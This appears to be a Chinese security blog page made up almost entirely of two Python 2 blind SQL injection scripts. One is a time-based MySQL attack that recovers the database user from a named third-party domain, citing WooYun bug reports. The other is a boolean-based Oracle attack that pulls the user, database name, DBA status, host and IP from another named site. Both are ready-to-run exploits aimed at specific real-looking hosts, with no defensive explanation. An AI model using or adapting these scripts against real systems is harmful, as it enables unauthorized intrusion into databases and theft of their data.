- A+
mysql
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
print 'start to retrive MySQL user:'
user = ''
for i in range(1,20):
for payload in payloads:
s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
s = "if(%s,benchmark(2000000,md5(1)),0)" % s
conn = httplib.HTTPConnection('wacom2012.wacom.com.cn', timeout=30)
conn.request(method='GET',url="/AjaxRequest/Ajax_Page.aspx?id=%s&method=getregprocity" % urllib.quote(s), headers = headers)
start_time = time.time()
conn.getresponse()
conn.close()
print '.',
#print time.time() - start_time
if time.time() - start_time >2:
user += payload
print '\n[In progress]', user,
#time.sleep(4.0)
break
print '\n[Done]MySQL user is %s' % user
from
http://wooyun.org/bugs/wooyun-2010-0170936
http://zone.wooyun.org/content/25653
Oracle
oracle 基于bool 盲注
# encoding=utf-8 import httplib import requests import time import string import sys payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.') print '[%s] Start to retrive Oracle info' % time.strftime('%H:%M:%S', time.localtime()) currentuser = '' currentdb = '' isdba1 = '' currenthost = '' currentip = '' for i in range(1,6,1): for payload in payloads: response = requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' AND ASCII(SUBSTR(user,{},1))={} AND '1'='1".format(str(i),str(ord(payload)))) if len(response.content) > 145000: currentuser += payload print '[currentuser]' ,currentuser time.sleep(0.01) break for i in range (1,5,1): for payload in payloads: response = requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' and ASCII(SUBSTR((SYS_CONTEXT('USERENV','DB_NAME')),{},1))={} and '1'='1".format(str(i),str(ord(payload)))) if len(response.content) > 145000: currentdb += payload print '[currentdb]' ,currentdb time.sleep(0.01) break for i in range (1,6,1): for payload in payloads: response = requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' and ASCII(SUBSTR((SYS_CONTEXT('USERENV','ISDBA')),{},1))={} and '1'='1".format(str(i),str(ord(payload)))) if len(response.content) > 145000: isdba1 += payload print '[currentisdba1]' ,isdba1 time.sleep(0.01) break for i in range (1,9,1): for payload in payloads: response = requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' and ASCII(SUBSTR((SYS_CONTEXT('USERENV','HOST')),{},1))={} and '1'='1".format(str(i),str(ord(payload)))) if len(response.content) > 145000: currenthost += payload print '[currenthost]' ,currenthost time.sleep(0.01) break for i in range (1,13,1): for payload in payloads: response = requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' and ASCII(SUBSTR((SYS_CONTEXT('USERENV','IP_ADDRESS')),{},1))={} and '1'='1".format(str(i),str(ord(payload)))) if len(response.content) > 145000: currentip += payload print '[currentip]' ,currentip time.sleep(0.01) break print '[%s] Stop to retrive Oracle info' % time.strftime('%H:%M:%S', time.localtime())
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-
